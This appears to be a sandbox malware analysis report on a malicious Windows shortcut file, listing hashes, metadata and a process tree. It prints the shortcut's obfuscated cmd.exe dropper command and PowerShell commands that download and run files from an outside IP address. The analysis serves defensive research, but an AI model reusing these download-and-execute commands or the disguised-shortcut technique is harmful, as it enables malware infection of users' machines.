| Field | Value |
|---|---|
| File name | 848a669d612185bbcbff5392f41a0d2e4ddad8cc5c276ec313216f1724a153fa |
| Full analysis | https://app.any.run/tasks/fc2460c9-84da-4b79-bac8-d9b1660b6f2b |
| Verdict | Malicious activity |
| Analysis date | August 26, 2019, 02:43:40 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators | — |
| MIME | application/octet-stream |
| File info | MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=16, Archive, ctime=Sun Nov 21 02:23:55 2010, mtime=Sun Nov 21 02:23:55 2010, atime=Sun Nov 21 02:23:55 2010, length=345088, window=hidenormalshowminimized |
| MD5 | 98FEB8F7B3B60BE46E17323D9C815089 |
| SHA1 | 70F7178F6DDB07431CCB1B7C0E6DBC45E186EAE3 |
| SHA256 | 848A669D612185BBCBFF5392F41A0D2E4DDAD8CC5C276EC313216F1724A153FA |
| SSDEEP | 24:8TTc78EaJpmQVUAOe+/zLaDRNmzPH3MtwUpvZbb+///Ecpca4I0w/6c2ie3SAiOI:8TlEkp2tzP8xpvxTIR16zpSLVihRvDM |
| Extension | File type |
|---|---|
| .lnk | Windows Shortcut (100) |
| Field | Value |
|---|---|
| Flags | IDList, LinkInfo, RelativePath, CommandArgs, IconFile, Unicode, ExpString, ExpIcon, TargetMetadata |
| FileAttributes | Archive |
| CreateDate | 2010:11:21 04:23:55+01:00 |
| AccessDate | 2010:11:21 04:23:55+01:00 |
| ModifyDate | 2010:11:21 04:23:55+01:00 |
| TargetFileSize | 345088 |
| IconIndex | 16 |
| RunWindow | Show Minimized No Activate |
| HotKey | (none) |
| TargetFileDOSName | cmd.exe |
| DriveType | Fixed Disk |
| VolumeLabel | - |
| LocalBasePath | C:\Windows\System32\cmd.exe |
| RelativePath | ..\..\..\..\..\..\Windows\System32\cmd.exe |
| CommandLineArguments | /C "( for /f "tokens=1,2 delims=!" %a in ('findstr fsdfssddgs "*.*"') do %temp:~-3,1%cho %b>>%TEMP%\ddwe.bat )&(%windir:~-1,1%tart /MIN %TEMP%\ddwe.bat)&EXIT" |
| IconFileName | C:\Windows\System32\imageres.dll |
| MachineID | win-oe3kip7un0v |
| PID | CMD | Path | Indicators | Parent process | User | Company | Integrity Level | Description | Exit code | Version |
|---|---|---|---|---|---|---|---|---|---|---|
| 3700 | "C:\Windows\System32\cmd.exe" /C "( for /f "tokens=1,2 delims=!" %a in ('findstr fsdfssddgs "*.*"') do %temp:~-3,1%cho %b>>C:\Users\admin\AppData\Local\Temp\ddwe.bat )&(%windir:~-1,1%tart /MIN C:\Users\admin\AppData\Local\Temp\ddwe.bat)&EXIT" | C:\Windows\System32\cmd.exe | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 2356 | C:\Windows\system32\cmd.exe /c findstr fsdfssddgs "*.*" | C:\Windows\system32\cmd.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 2572 | findstr fsdfssddgs "*.*" | C:\Windows\system32\findstr.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Find String (QGREP) Utility | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
| 3100 | C:\Windows\system32\cmd.exe /K C:\Users\admin\AppData\Local\Temp\ddwe.bat | C:\Windows\system32\cmd.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 3892 | powershell Invoke-WebRequest -Uri "http://185.82.202.66/rar.exe" -OutFile "C:\Users\admin\AppData\Local\Temp\rar.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 1 | 6.1.7600.16385 (win7_rtm.090713-1255) |
| 2800 | powershell Invoke-WebRequest -Uri "http://185.82.202.66/pork.rar" -OutFile "C:\Users\admin\AppData\Local\Temp\pork.rar" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 1 | 6.1.7600.16385 (win7_rtm.090713-1255) |
| 3628 | powershell start-Process -FilePath "C:\Users\admin\AppData\Local\Temp\pork.bat" -WindowStyle hidden | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 1 | 6.1.7600.16385 (win7_rtm.090713-1255) |
| PID | Process | Operation | Key | Name | Value |
|---|---|---|---|---|---|
| 3892 | powershell.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E | LanguageList | en-US |
| 2800 | powershell.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E | LanguageList | en-US |
| 3628 | powershell.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E | LanguageList | en-US |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3892 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QQETYY1VUJRNQ3HHSSAJ.temp | — | — | — |
| 2800 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MSBU7FZB8P2UROYN0I9H.temp | — | — | — |
| 3628 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K0036NA8XBUKYW041Z4K.temp | — | — | — |
| 3100 | cmd.exe | C:\Users\admin\AppData\Local\Temp\ddwe.bat | — | — | — |
| 3892 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF169b3b.TMP | binary | 0F2CAD9746414ABA31294C3B560FCFD5 | 19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 |
| 3100 | cmd.exe | C:\Users\admin\AppData\Local\Temp\pork.txt | text | FA7D38E2978C6493B11157F795323C1F | 77D17F6A0739C8CC5D3D81951DD552774A3FDD5D4C8A943FC295A2B721E31332 |
| 3700 | cmd.exe | C:\Users\admin\AppData\Local\Temp\ddwe.bat | text | DBF82D68E3E77A8CB49F28E95357BD44 | 9EBB6857F06052A62D88BC82A40D4C2BCF9D3BAF7394AEA84110844A5492408D |
| 3628 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16a117.TMP | binary | 0F2CAD9746414ABA31294C3B560FCFD5 | 19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 |
| 2800 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF169e96.TMP | binary | 0F2CAD9746414ABA31294C3B560FCFD5 | 19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 |
| 2800 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 0F2CAD9746414ABA31294C3B560FCFD5 | 19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 |